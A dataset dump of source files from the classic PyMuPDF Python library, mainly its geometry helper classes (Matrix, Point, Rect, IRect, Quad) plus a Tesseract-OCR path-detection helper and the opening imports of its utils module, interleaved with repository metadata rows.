b'r5JvHFvnyTd9WA36xjdZRCbPO2/wrS8cIK2MOmuSI6NOBnVt1FkZNBh1Gldjo04G16szXJ'
b'mhR0e4JgC1jSdD+qN7xIRbHVhFCRs0visQvfW39fEPtSnPGN/M2adlaT9D1xABoXNwcOge'
b'AGhtCSn1S+VVi28ZqWeWcCM1an0KwBp+8tO+sV4tzJcYVjraj9ezPPkWLeAgtpuWk2hS37'
b'pbJ6NRAaITtgg/OmFL+mh2rybmK2z/WFrtX5UG8FtSltJ7Sh4Jm0oWiXeVbLB6s8gi0W6R'
b'hfSukEXUzo8F9HkXi/jtHUuZZvT7wLfOqAusAngYDg7PJpNFwK0MwFD3ndEakhGdR0ShbD'
b'vdnOYEzKK/vko+I6oLj+HcLr3KcG4U3zL5Fh0rQwWOjpWRPgzqPnBUQW0lwoYRDYwQNToR'
b'A/fRiRjQ0s/D79gsABOib2GDDQmK7OEReGQPP0/+7a59v0z+H+SUGTTsMAEA'
)).decode().splitlines()
def get_tessdata() -> str:
"""Detect Tesseract-OCR and return its language support folder.
This function can be used to enable OCR via Tesseract even if the
environment variable TESSDATA_PREFIX has not been set.
If the value of TESSDATA_PREFIX is None, the function tries to locate
Tesseract-OCR and fills the required variable.
Returns:
Folder name of tessdata if Tesseract-OCR is available, otherwise False.
"""
TESSDATA_PREFIX = os.getenv("TESSDATA_PREFIX")
if TESSDATA_PREFIX != None:
return TESSDATA_PREFIX
if sys.platform == "win32":
tessdata = "C:\\Program Files\\Tesseract-OCR\\tessdata"
else:
tessdata = "/usr/share/tesseract-ocr/4.00/tessdata"
if os.path.exists(tessdata):
return tessdata
"""
Try to locate the tesseract-ocr installation.
"""
# Windows systems:
if sys.platform == "win32":
try:
response = os.popen("where tesseract").read().strip()
except:
response = ""
if not response:
print("Tesseract-OCR is not installed")
return False
dirname = os.path.dirname(response) # path of tesseract.exe
tessdata = os.path.join(dirname, "tessdata") # language support
if os.path.exists(tessdata): # all ok?
return tessdata
else: # should not happen!
print("unexpected: Tesseract-OCR has no 'tessdata' folder", file=sys.stderr)
return False
# Unix-like systems:
try:
response = os.popen("whereis tesseract-ocr").read().strip().split()
except:
response = ""
if len(response) != 2: # if not 2 tokens: no tesseract-ocr
print("Tesseract-OCR is not installed")
return False
# determine tessdata via iteration over subfolders
tessdata = None
for sub_response in response.iterdir():
for sub_sub in sub_response.iterdir():
if str(sub_sub).endswith("tessdata"):
tessdata = sub_sub
break
if tessdata != None:
return tessdata
else:
print(
"unexpected: tesseract-ocr has no 'tessdata' folder",
file=sys.stderr,
)
return False
return False
%}
| 81,757 | Python | .py | 1,973 | 35.428789 | 139 | 0.692846 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,378 | helper-geo-py.i | pymupdf_PyMuPDF/src_classic/helper-geo-py.i | %pythoncode %{
# ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
# largest 32bit integers surviving C float conversion roundtrips
# used by MuPDF to define infinite rectangles
FZ_MIN_INF_RECT = -0x80000000
FZ_MAX_INF_RECT = 0x7fffff80
class Matrix(object):
"""Matrix() - all zeros
Matrix(a, b, c, d, e, f)
Matrix(zoom-x, zoom-y) - zoom
Matrix(shear-x, shear-y, 1) - shear
Matrix(degree) - rotate
Matrix(Matrix) - new copy
Matrix(sequence) - from 'sequence'"""
def __init__(self, *args):
if not args:
self.a = self.b = self.c = self.d = self.e = self.f = 0.0
return None
if len(args) > 6:
raise ValueError("Matrix: bad seq len")
if len(args) == 6: # 6 numbers
self.a, self.b, self.c, self.d, self.e, self.f = map(float, args)
return None
if len(args) == 1: # either an angle or a sequ
if hasattr(args[0], "__float__"):
theta = math.radians(args[0])
c = round(math.cos(theta), 12)
s = round(math.sin(theta), 12)
self.a = self.d = c
self.b = s
self.c = -s
self.e = self.f = 0.0
return None
else:
self.a, self.b, self.c, self.d, self.e, self.f = map(float, args[0])
return None
if len(args) == 2 or len(args) == 3 and args[2] == 0:
self.a, self.b, self.c, self.d, self.e, self.f = float(args[0]), \
0.0, 0.0, float(args[1]), 0.0, 0.0
return None
if len(args) == 3 and args[2] == 1:
self.a, self.b, self.c, self.d, self.e, self.f = 1.0, \
float(args[1]), float(args[0]), 1.0, 0.0, 0.0
return None
raise ValueError("Matrix: bad args")
def invert(self, src=None):
"""Calculate the inverted matrix. Return 0 if successful and replace
current one. Else return 1 and do nothing.
"""
if src is None:
dst = util_invert_matrix(self)
else:
dst = util_invert_matrix(src)
if dst[0] == 1:
return 1
self.a, self.b, self.c, self.d, self.e, self.f = dst[1]
return 0
def pretranslate(self, tx, ty):
"""Calculate pre translation and replace current matrix."""
tx = float(tx)
ty = float(ty)
self.e += tx * self.a + ty * self.c
self.f += tx * self.b + ty * self.d
return self
def prescale(self, sx, sy):
"""Calculate pre scaling and replace current matrix."""
sx = float(sx)
sy = float(sy)
self.a *= sx
self.b *= sx
self.c *= sy
self.d *= sy
return self
def preshear(self, h, v):
"""Calculate pre shearing and replace current matrix."""
h = float(h)
v = float(v)
a, b = self.a, self.b
self.a += v * self.c
self.b += v * self.d
self.c += h * a
self.d += h * b
return self
def prerotate(self, theta):
"""Calculate pre rotation and replace current matrix."""
theta = float(theta)
while theta < 0: theta += 360
while theta >= 360: theta -= 360
if abs(0 - theta) < EPSILON:
pass
elif abs(90.0 - theta) < EPSILON:
a = self.a
b = self.b
self.a = self.c
self.b = self.d
self.c = -a
self.d = -b
elif abs(180.0 - theta) < EPSILON:
self.a = -self.a
self.b = -self.b
self.c = -self.c
self.d = -self.d
elif abs(270.0 - theta) < EPSILON:
a = self.a
b = self.b
self.a = -self.c
self.b = -self.d
self.c = a
self.d = b
else:
rad = math.radians(theta)
s = math.sin(rad)
c = math.cos(rad)
a = self.a
b = self.b
self.a = c * a + s * self.c
self.b = c * b + s * self.d
self.c =-s * a + c * self.c
self.d =-s * b + c * self.d
return self
def concat(self, one, two):
"""Multiply two matrices and replace current one."""
if not len(one) == len(two) == 6:
raise ValueError("Matrix: bad seq len")
self.a, self.b, self.c, self.d, self.e, self.f = util_concat_matrix(one, two)
return self
def __getitem__(self, i):
return (self.a, self.b, self.c, self.d, self.e, self.f)[i]
def __setitem__(self, i, v):
v = float(v)
if i == 0: self.a = v
elif i == 1: self.b = v
elif i == 2: self.c = v
elif i == 3: self.d = v
elif i == 4: self.e = v
elif i == 5: self.f = v
else:
raise IndexError("index out of range")
return
def __len__(self):
return 6
def __repr__(self):
return "Matrix" + str(tuple(self))
def __invert__(self):
"""Calculate inverted matrix."""
m1 = Matrix()
m1.invert(self)
return m1
__inv__ = __invert__
def __mul__(self, m):
if hasattr(m, "__float__"):
return Matrix(self.a * m, self.b * m, self.c * m,
self.d * m, self.e * m, self.f * m)
m1 = Matrix(1,1)
return m1.concat(self, m)
def __truediv__(self, m):
if hasattr(m, "__float__"):
return Matrix(self.a * 1./m, self.b * 1./m, self.c * 1./m,
self.d * 1./m, self.e * 1./m, self.f * 1./m)
m1 = util_invert_matrix(m)[1]
if not m1:
raise ZeroDivisionError("matrix not invertible")
m2 = Matrix(1,1)
return m2.concat(self, m1)
__div__ = __truediv__
def __add__(self, m):
if hasattr(m, "__float__"):
return Matrix(self.a + m, self.b + m, self.c + m,
self.d + m, self.e + m, self.f + m)
if len(m) != 6:
raise ValueError("Matrix: bad seq len")
return Matrix(self.a + m[0], self.b + m[1], self.c + m[2],
self.d + m[3], self.e + m[4], self.f + m[5])
def __sub__(self, m):
if hasattr(m, "__float__"):
return Matrix(self.a - m, self.b - m, self.c - m,
self.d - m, self.e - m, self.f - m)
if len(m) != 6:
raise ValueError("Matrix: bad seq len")
return Matrix(self.a - m[0], self.b - m[1], self.c - m[2],
self.d - m[3], self.e - m[4], self.f - m[5])
def __pos__(self):
return Matrix(self)
def __neg__(self):
return Matrix(-self.a, -self.b, -self.c, -self.d, -self.e, -self.f)
def __bool__(self):
return not (max(self) == min(self) == 0)
def __nonzero__(self):
return not (max(self) == min(self) == 0)
def __eq__(self, mat):
if not hasattr(mat, "__len__"):
return False
return len(mat) == 6 and bool(self - mat) is False
def __abs__(self):
return math.sqrt(sum([c*c for c in self]))
norm = __abs__
@property
def is_rectilinear(self):
"""True if rectangles are mapped to rectangles."""
return (abs(self.b) < EPSILON and abs(self.c) < EPSILON) or \
(abs(self.a) < EPSILON and abs(self.d) < EPSILON);
class IdentityMatrix(Matrix):
"""Identity matrix [1, 0, 0, 1, 0, 0]"""
def __init__(self):
Matrix.__init__(self, 1.0, 1.0)
def __setattr__(self, name, value):
if name in "ad":
self.__dict__[name] = 1.0
elif name in "bcef":
self.__dict__[name] = 0.0
else:
self.__dict__[name] = value
def checkargs(*args):
raise NotImplementedError("Identity is readonly")
prerotate = checkargs
preshear = checkargs
prescale = checkargs
pretranslate = checkargs
concat = checkargs
invert = checkargs
def __repr__(self):
return "IdentityMatrix(1.0, 0.0, 0.0, 1.0, 0.0, 0.0)"
def __hash__(self):
return hash((1,0,0,1,0,0))
Identity = IdentityMatrix()
class Point(object):
"""Point() - all zeros\nPoint(x, y)\nPoint(Point) - new copy\nPoint(sequence) - from 'sequence'"""
def __init__(self, *args):
if not args:
self.x = 0.0
self.y = 0.0
return None
if len(args) > 2:
raise ValueError("Point: bad seq len")
if len(args) == 2:
self.x = float(args[0])
self.y = float(args[1])
return None
if len(args) == 1:
l = args[0]
if hasattr(l, "__getitem__") is False:
raise ValueError("Point: bad args")
if len(l) != 2:
raise ValueError("Point: bad seq len")
self.x = float(l[0])
self.y = float(l[1])
return None
raise ValueError("Point: bad args")
def transform(self, m):
"""Replace point by its transformation with matrix-like m."""
if len(m) != 6:
raise ValueError("Matrix: bad seq len")
self.x, self.y = util_transform_point(self, m)
return self
@property
def unit(self):
"""Unit vector of the point."""
s = self.x * self.x + self.y * self.y
if s < EPSILON:
return Point(0,0)
s = math.sqrt(s)
return Point(self.x / s, self.y / s)
@property
def abs_unit(self):
"""Unit vector with positive coordinates."""
s = self.x * self.x + self.y * self.y
if s < EPSILON:
return Point(0,0)
s = math.sqrt(s)
return Point(abs(self.x) / s, abs(self.y) / s)
def distance_to(self, *args):
"""Return distance to rectangle or another point."""
if not len(args) > 0:
raise ValueError("at least one parameter must be given")
x = args[0]
if len(x) == 2:
x = Point(x)
elif len(x) == 4:
x = Rect(x)
else:
raise ValueError("arg1 must be point-like or rect-like")
if len(args) > 1:
unit = args[1]
else:
unit = "px"
u = {"px": (1.,1.), "in": (1.,72.), "cm": (2.54, 72.),
"mm": (25.4, 72.)}
f = u[unit][0] / u[unit][1]
if type(x) is Point:
return abs(self - x) * f
# from here on, x is a rectangle
# as a safeguard, make a finite copy of it
r = Rect(x.top_left, x.top_left)
r = r | x.bottom_right
if self in r:
return 0.0
if self.x > r.x1:
if self.y >= r.y1:
return self.distance_to(r.bottom_right, unit)
elif self.y <= r.y0:
return self.distance_to(r.top_right, unit)
else:
return (self.x - r.x1) * f
elif r.x0 <= self.x <= r.x1:
if self.y >= r.y1:
return (self.y - r.y1) * f
else:
return (r.y0 - self.y) * f
else:
if self.y >= r.y1:
return self.distance_to(r.bottom_left, unit)
elif self.y <= r.y0:
return self.distance_to(r.top_left, unit)
else:
return (r.x0 - self.x) * f
def __getitem__(self, i):
return (self.x, self.y)[i]
def __len__(self):
return 2
def __setitem__(self, i, v):
v = float(v)
if i == 0: self.x = v
elif i == 1: self.y = v
else:
raise IndexError("index out of range")
return None
def __repr__(self):
return "Point" + str(tuple(self))
def __pos__(self):
return Point(self)
def __neg__(self):
return Point(-self.x, -self.y)
def __bool__(self):
return not (max(self) == min(self) == 0)
def __nonzero__(self):
return not (max(self) == min(self) == 0)
def __eq__(self, p):
if not hasattr(p, "__len__"):
return False
return len(p) == 2 and bool(self - p) is False
def __abs__(self):
return math.sqrt(self.x * self.x + self.y * self.y)
norm = __abs__
def __add__(self, p):
if hasattr(p, "__float__"):
return Point(self.x + p, self.y + p)
if len(p) != 2:
raise ValueError("Point: bad seq len")
return Point(self.x + p[0], self.y + p[1])
def __sub__(self, p):
if hasattr(p, "__float__"):
return Point(self.x - p, self.y - p)
if len(p) != 2:
raise ValueError("Point: bad seq len")
return Point(self.x - p[0], self.y - p[1])
def __mul__(self, m):
if hasattr(m, "__float__"):
return Point(self.x * m, self.y * m)
p = Point(self)
return p.transform(m)
def __truediv__(self, m):
if hasattr(m, "__float__"):
return Point(self.x * 1./m, self.y * 1./m)
m1 = util_invert_matrix(m)[1]
if not m1:
raise ZeroDivisionError("matrix not invertible")
p = Point(self)
return p.transform(m1)
__div__ = __truediv__
def __hash__(self):
return hash(tuple(self))
class Rect(object):
"""Rect() - all zeros
Rect(x0, y0, x1, y1) - 4 coordinates
Rect(top-left, x1, y1) - point and 2 coordinates
Rect(x0, y0, bottom-right) - 2 coordinates and point
Rect(top-left, bottom-right) - 2 points
Rect(sequ) - new from sequence or rect-like
"""
def __init__(self, *args):
self.x0, self.y0, self.x1, self.y1 = util_make_rect(args)
return None
def normalize(self):
"""Replace rectangle with its valid version."""
if self.x1 < self.x0:
self.x0, self.x1 = self.x1, self.x0
if self.y1 < self.y0:
self.y0, self.y1 = self.y1, self.y0
return self
@property
def is_empty(self):
"""True if rectangle area is empty."""
return self.x0 >= self.x1 or self.y0 >= self.y1
@property
def is_valid(self):
"""True if rectangle is valid."""
return self.x0 <= self.x1 and self.y0 <= self.y1
@property
def is_infinite(self):
"""True if this is the infinite rectangle."""
return self.x0 == self.y0 == FZ_MIN_INF_RECT and self.x1 == self.y1 == FZ_MAX_INF_RECT
@property
def top_left(self):
"""Top-left corner."""
return Point(self.x0, self.y0)
@property
def top_right(self):
"""Top-right corner."""
return Point(self.x1, self.y0)
@property
def bottom_left(self):
"""Bottom-left corner."""
return Point(self.x0, self.y1)
@property
def bottom_right(self):
"""Bottom-right corner."""
return Point(self.x1, self.y1)
tl = top_left
tr = top_right
bl = bottom_left
br = bottom_right
@property
def quad(self):
"""Return Quad version of rectangle."""
return Quad(self.tl, self.tr, self.bl, self.br)
def torect(self, r):
"""Return matrix that converts to target rect."""
r = Rect(r)
if self.is_infinite or self.is_empty or r.is_infinite or r.is_empty:
raise ValueError("rectangles must be finite and not empty")
return (
Matrix(1, 0, 0, 1, -self.x0, -self.y0)
* Matrix(r.width / self.width, r.height / self.height)
* Matrix(1, 0, 0, 1, r.x0, r.y0)
)
def morph(self, p, m):
"""Morph with matrix-like m and point-like p.
Returns a new quad."""
if self.is_infinite:
return INFINITE_QUAD()
return self.quad.morph(p, m)
def round(self):
"""Return the IRect."""
return IRect(util_round_rect(self))
irect = property(round)
width = property(lambda self: self.x1 - self.x0 if self.x1 > self.x0 else 0)
height = property(lambda self: self.y1 - self.y0 if self.y1 > self.y0 else 0)
def include_point(self, p):
"""Extend to include point-like p."""
if len(p) != 2:
raise ValueError("Point: bad seq len")
self.x0, self.y0, self.x1, self.y1 = util_include_point_in_rect(self, p)
return self
def include_rect(self, r):
"""Extend to include rect-like r."""
if len(r) != 4:
raise ValueError("Rect: bad seq len")
r = Rect(r)
if r.is_infinite or self.is_infinite:
self.x0, self.y0, self.x1, self.y1 = FZ_MIN_INF_RECT, FZ_MIN_INF_RECT, FZ_MAX_INF_RECT, FZ_MAX_INF_RECT
elif r.is_empty:
return self
elif self.is_empty:
self.x0, self.y0, self.x1, self.y1 = r.x0, r.y0, r.x1, r.y1
else:
self.x0, self.y0, self.x1, self.y1 = util_union_rect(self, r)
return self
def intersect(self, r):
"""Restrict to common rect with rect-like r."""
if not len(r) == 4:
raise ValueError("Rect: bad seq len")
r = Rect(r)
if r.is_infinite:
return self
elif self.is_infinite:
self.x0, self.y0, self.x1, self.y1 = r.x0, r.y0, r.x1, r.y1
elif r.is_empty:
self.x0, self.y0, self.x1, self.y1 = r.x0, r.y0, r.x1, r.y1
elif self.is_empty:
return self
else:
self.x0, self.y0, self.x1, self.y1 = util_intersect_rect(self, r)
return self
def contains(self, x):
"""Check if containing point-like or rect-like x."""
return self.__contains__(x)
def transform(self, m):
"""Replace with the transformation by matrix-like m."""
if not len(m) == 6:
raise ValueError("Matrix: bad seq len")
self.x0, self.y0, self.x1, self.y1 = util_transform_rect(self, m)
return self
def __getitem__(self, i):
return (self.x0, self.y0, self.x1, self.y1)[i]
def __len__(self):
return 4
def __setitem__(self, i, v):
v = float(v)
if i == 0: self.x0 = v
elif i == 1: self.y0 = v
elif i == 2: self.x1 = v
elif i == 3: self.y1 = v
else:
raise IndexError("index out of range")
return None
def __repr__(self):
return "Rect" + str(tuple(self))
def __pos__(self):
return Rect(self)
def __neg__(self):
return Rect(-self.x0, -self.y0, -self.x1, -self.y1)
def __bool__(self):
return not self.x0 == self.y0 == self.x1 == self.y1 == 0
def __nonzero__(self):
return not self.x0 == self.y0 == self.x1 == self.y1 == 0
def __eq__(self, r):
if not hasattr(r, "__len__"):
return False
return len(r) == 4 and self.x0 == r[0] and self.y0 == r[1] and self.x1 == r[2] and self.y1 == r[3]
def __abs__(self):
if self.is_infinite or not self.is_valid:
return 0.0
return self.width * self.height
def norm(self):
return math.sqrt(sum([c*c for c in self]))
def __add__(self, p):
if hasattr(p, "__float__"):
return Rect(self.x0 + p, self.y0 + p, self.x1 + p, self.y1 + p)
if len(p) != 4:
raise ValueError("Rect: bad seq len")
return Rect(self.x0 + p[0], self.y0 + p[1], self.x1 + p[2], self.y1 + p[3])
def __sub__(self, p):
if hasattr(p, "__float__"):
return Rect(self.x0 - p, self.y0 - p, self.x1 - p, self.y1 - p)
if len(p) != 4:
raise ValueError("Rect: bad seq len")
return Rect(self.x0 - p[0], self.y0 - p[1], self.x1 - p[2], self.y1 - p[3])
def __mul__(self, m):
if hasattr(m, "__float__"):
return Rect(self.x0 * m, self.y0 * m, self.x1 * m, self.y1 * m)
r = Rect(self)
r = r.transform(m)
return r
def __truediv__(self, m):
if hasattr(m, "__float__"):
return Rect(self.x0 * 1./m, self.y0 * 1./m, self.x1 * 1./m, self.y1 * 1./m)
im = util_invert_matrix(m)[1]
if not im:
raise ZeroDivisionError("Matrix not invertible")
r = Rect(self)
r = r.transform(im)
return r
__div__ = __truediv__
def __contains__(self, x):
if hasattr(x, "__float__"):
return x in tuple(self)
l = len(x)
if l == 2:
return util_is_point_in_rect(x, self)
if l == 4:
r = INFINITE_RECT()
try:
r = Rect(x)
except:
r = Quad(x).rect
return (self.x0 <= r.x0 <= r.x1 <= self.x1 and
self.y0 <= r.y0 <= r.y1 <= self.y1)
return False
def __or__(self, x):
if not hasattr(x, "__len__"):
raise ValueError("bad type op 2")
r = Rect(self)
if len(x) == 2:
return r.include_point(x)
if len(x) == 4:
return r.include_rect(x)
raise ValueError("bad type op 2")
def __and__(self, x):
if not hasattr(x, "__len__") or len(x) != 4:
raise ValueError("bad type op 2")
r = Rect(self)
return r.intersect(x)
def intersects(self, x):
"""Check if intersection with rectangle x is not empty."""
r1 = Rect(x)
if self.is_empty or self.is_infinite or r1.is_empty or r1.is_infinite:
return False
r = Rect(self)
if r.intersect(r1).is_empty:
return False
return True
def __hash__(self):
return hash(tuple(self))
class IRect(object):
"""IRect() - all zeros
IRect(x0, y0, x1, y1) - 4 coordinates
IRect(top-left, x1, y1) - point and 2 coordinates
IRect(x0, y0, bottom-right) - 2 coordinates and point
IRect(top-left, bottom-right) - 2 points
IRect(sequ) - new from sequence or rect-like
"""
def __init__(self, *args):
self.x0, self.y0, self.x1, self.y1 = util_make_irect(args)
return None
def normalize(self):
"""Replace rectangle with its valid version."""
if self.x1 < self.x0:
self.x0, self.x1 = self.x1, self.x0
if self.y1 < self.y0:
self.y0, self.y1 = self.y1, self.y0
return self
@property
def is_empty(self):
"""True if rectangle area is empty."""
return self.x0 >= self.x1 or self.y0 >= self.y1
@property
def is_valid(self):
"""True if rectangle is valid."""
return self.x0 <= self.x1 and self.y0 <= self.y1
@property
def is_infinite(self):
"""True if rectangle is infinite."""
return self.x0 == self.y0 == FZ_MIN_INF_RECT and self.x1 == self.y1 == FZ_MAX_INF_RECT
@property
def top_left(self):
"""Top-left corner."""
return Point(self.x0, self.y0)
@property
def top_right(self):
"""Top-right corner."""
return Point(self.x1, self.y0)
@property
def bottom_left(self):
"""Bottom-left corner."""
return Point(self.x0, self.y1)
@property
def bottom_right(self):
"""Bottom-right corner."""
return Point(self.x1, self.y1)
tl = top_left
tr = top_right
bl = bottom_left
br = bottom_right
@property
def quad(self):
"""Return Quad version of rectangle."""
return Quad(self.tl, self.tr, self.bl, self.br)
def torect(self, r):
"""Return matrix that converts to target rect."""
r = Rect(r)
if self.is_infinite or self.is_empty or r.is_infinite or r.is_empty:
raise ValueError("rectangles must be finite and not empty")
return (
Matrix(1, 0, 0, 1, -self.x0, -self.y0)
* Matrix(r.width / self.width, r.height / self.height)
* Matrix(1, 0, 0, 1, r.x0, r.y0)
)
def morph(self, p, m):
"""Morph with matrix-like m and point-like p.
Returns a new quad."""
if self.is_infinite:
return INFINITE_QUAD()
return self.quad.morph(p, m)
@property
def rect(self):
return Rect(self)
width = property(lambda self: self.x1 - self.x0 if self.x1 > self.x0 else 0)
height = property(lambda self: self.y1 - self.y0 if self.y1 > self.y0 else 0)
def include_point(self, p):
"""Extend rectangle to include point p."""
rect = self.rect.include_point(p)
return rect.irect
def include_rect(self, r):
"""Extend rectangle to include rectangle r."""
rect = self.rect.include_rect(r)
return rect.irect
def intersect(self, r):
"""Restrict rectangle to intersection with rectangle r."""
rect = self.rect.intersect(r)
return rect.irect
def __getitem__(self, i):
return (self.x0, self.y0, self.x1, self.y1)[i]
def __len__(self):
return 4
def __setitem__(self, i, v):
v = int(v)
if i == 0: self.x0 = v
elif i == 1: self.y0 = v
elif i == 2: self.x1 = v
elif i == 3: self.y1 = v
else:
raise IndexError("index out of range")
return None
def __repr__(self):
return "IRect" + str(tuple(self))
def __pos__(self):
return IRect(self)
def __neg__(self):
return IRect(-self.x0, -self.y0, -self.x1, -self.y1)
def __bool__(self):
return not self.x0 == self.y0 == self.x1 == self.y1 == 0
def __nonzero__(self):
return not self.x0 == self.y0 == self.x1 == self.y1 == 0
def __eq__(self, r):
if not hasattr(r, "__len__"):
return False
return len(r) == 4 and self.x0 == r[0] and self.y0 == r[1] and self.x1 == r[2] and self.y1 == r[3]
def __abs__(self):
if self.is_infinite or not self.is_valid:
return 0
return self.width * self.height
def norm(self):
return math.sqrt(sum([c*c for c in self]))
def __add__(self, p):
return Rect.__add__(self, p).round()
def __sub__(self, p):
return Rect.__sub__(self, p).round()
def transform(self, m):
return Rect.transform(self, m).round()
def __mul__(self, m):
return Rect.__mul__(self, m).round()
def __truediv__(self, m):
return Rect.__truediv__(self, m).round()
__div__ = __truediv__
def __contains__(self, x):
return Rect.__contains__(self, x)
def __or__(self, x):
return Rect.__or__(self, x).round()
def __and__(self, x):
return Rect.__and__(self, x).round()
def intersects(self, x):
return Rect.intersects(self, x)
def __hash__(self):
return hash(tuple(self))
class Quad(object):
"""Quad() - all zero points\nQuad(ul, ur, ll, lr)\nQuad(quad) - new copy\nQuad(sequence) - from 'sequence'"""
def __init__(self, *args):
if not args:
self.ul = self.ur = self.ll = self.lr = Point()
return None
if len(args) > 4:
raise ValueError("Quad: bad seq len")
if len(args) == 4:
self.ul, self.ur, self.ll, self.lr = map(Point, args)
return None
if len(args) == 1:
l = args[0]
if hasattr(l, "__getitem__") is False:
raise ValueError("Quad: bad args")
if len(l) != 4:
raise ValueError("Quad: bad seq len")
self.ul, self.ur, self.ll, self.lr = map(Point, l)
return None
raise ValueError("Quad: bad args")
@property
def is_rectangular(self)->bool:
"""Check if quad is rectangular.
Notes:
Some rotation matrix can thus transform it into a rectangle.
This is equivalent to three corners enclose 90 degrees.
Returns:
True or False.
"""
sine = util_sine_between(self.ul, self.ur, self.lr)
if abs(sine - 1) > EPSILON: # the sine of the angle
return False
sine = util_sine_between(self.ur, self.lr, self.ll)
if abs(sine - 1) > EPSILON:
return False
sine = util_sine_between(self.lr, self.ll, self.ul)
if abs(sine - 1) > EPSILON:
return False
return True
@property
def is_convex(self)->bool:
"""Check if quad is convex and not degenerate.
Notes:
Check that for the two diagonals, the other two corners are not
on the same side of the diagonal.
Returns:
True or False.
"""
m = planish_line(self.ul, self.lr) # puts this diagonal on x-axis
p1 = self.ll * m # transform the
p2 = self.ur * m # other two points
if p1.y * p2.y > 0:
return False
m = planish_line(self.ll, self.ur) # puts other diagonal on x-axis
p1 = self.lr * m # tranform the
p2 = self.ul * m # remaining points
if p1.y * p2.y > 0:
return False
return True
width = property(lambda self: max(abs(self.ul - self.ur), abs(self.ll - self.lr)))
height = property(lambda self: max(abs(self.ul - self.ll), abs(self.ur - self.lr)))
@property
def is_empty(self):
"""Check whether all quad corners are on the same line.
This is the case if width or height is zero.
"""
return self.width < EPSILON or self.height < EPSILON
@property
def is_infinite(self):
"""Check whether this is the infinite quad."""
return self.rect.is_infinite
@property
def rect(self):
r = Rect()
r.x0 = min(self.ul.x, self.ur.x, self.lr.x, self.ll.x)
r.y0 = min(self.ul.y, self.ur.y, self.lr.y, self.ll.y)
r.x1 = max(self.ul.x, self.ur.x, self.lr.x, self.ll.x)
r.y1 = max(self.ul.y, self.ur.y, self.lr.y, self.ll.y)
return r
def __contains__(self, x):
try:
l = x.__len__()
except:
return False
if l == 2:
return util_point_in_quad(x, self)
if l != 4:
return False
if CheckRect(x):
if Rect(x).is_empty:
return True
return util_point_in_quad(x[:2], self) and util_point_in_quad(x[2:], self)
if CheckQuad(x):
for i in range(4):
if not util_point_in_quad(x[i], self):
return False
return True
return False
def __getitem__(self, i):
return (self.ul, self.ur, self.ll, self.lr)[i]
def __len__(self):
return 4
def __setitem__(self, i, v):
if i == 0: self.ul = Point(v)
elif i == 1: self.ur = Point(v)
elif i == 2: self.ll = Point(v)
elif i == 3: self.lr = Point(v)
else:
raise IndexError("index out of range")
return None
def __repr__(self):
return "Quad" + str(tuple(self))
def __pos__(self):
return Quad(self)
def __neg__(self):
return Quad(-self.ul, -self.ur, -self.ll, -self.lr)
def __bool__(self):
return not self.is_empty
def __nonzero__(self):
return not self.is_empty
def __eq__(self, quad):
if not hasattr(quad, "__len__"):
return False
return len(quad) == 4 and (
self.ul == quad[0] and
self.ur == quad[1] and
self.ll == quad[2] and
self.lr == quad[3]
)
def __abs__(self):
if self.is_empty:
return 0.0
return abs(self.ul - self.ur) * abs(self.ul - self.ll)
def morph(self, p, m):
"""Morph the quad with matrix-like 'm' and point-like 'p'.
Return a new quad."""
if self.is_infinite:
return INFINITE_QUAD()
delta = Matrix(1, 1).pretranslate(p.x, p.y)
q = self * ~delta * m * delta
return q
def transform(self, m):
"""Replace quad by its transformation with matrix m."""
if hasattr(m, "__float__"):
pass
elif len(m) != 6:
raise ValueError("Matrix: bad seq len")
self.ul *= m
self.ur *= m
self.ll *= m
self.lr *= m
return self
def __mul__(self, m):
q = Quad(self)
q = q.transform(m)
return q
def __add__(self, q):
if hasattr(q, "__float__"):
return Quad(self.ul + q, self.ur + q, self.ll + q, self.lr + q)
if len(p) != 4:
raise ValueError("Quad: bad seq len")
return Quad(self.ul + q[0], self.ur + q[1], self.ll + q[2], self.lr + q[3])
def __sub__(self, q):
if hasattr(q, "__float__"):
return Quad(self.ul - q, self.ur - q, self.ll - q, self.lr - q)
if len(p) != 4:
raise ValueError("Quad: bad seq len")
return Quad(self.ul - q[0], self.ur - q[1], self.ll - q[2], self.lr - q[3])
def __truediv__(self, m):
if hasattr(m, "__float__"):
im = 1. / m
else:
im = util_invert_matrix(m)[1]
if not im:
raise ZeroDivisionError("Matrix not invertible")
q = Quad(self)
q = q.transform(im)
return q
__div__ = __truediv__
def __hash__(self):
return hash(tuple(self))
# some special geometry objects
def EMPTY_RECT():
return Rect(FZ_MAX_INF_RECT, FZ_MAX_INF_RECT, FZ_MIN_INF_RECT, FZ_MIN_INF_RECT)
def INFINITE_RECT():
return Rect(FZ_MIN_INF_RECT, FZ_MIN_INF_RECT, FZ_MAX_INF_RECT, FZ_MAX_INF_RECT)
def EMPTY_IRECT():
return IRect(FZ_MAX_INF_RECT, FZ_MAX_INF_RECT, FZ_MIN_INF_RECT, FZ_MIN_INF_RECT)
def INFINITE_IRECT():
return IRect(FZ_MIN_INF_RECT, FZ_MIN_INF_RECT, FZ_MAX_INF_RECT, FZ_MAX_INF_RECT)
def INFINITE_QUAD():
return INFINITE_RECT().quad
def EMPTY_QUAD():
return EMPTY_RECT().quad
%}
| 34,379 | Python | .py | 936 | 27.498932 | 115 | 0.521192 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,379 | utils.py | pymupdf_PyMuPDF/src_classic/utils.py | # ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
import io
import json
import math
import os
import random
import string
import tempfile
import typing
import warnings
from fitz_old import *
TESSDATA_PREFIX = os.getenv("TESSDATA_PREFIX")
point_like = "point_like"
rect_like = "rect_like"
matrix_like = "matrix_like"
quad_like = "quad_like"
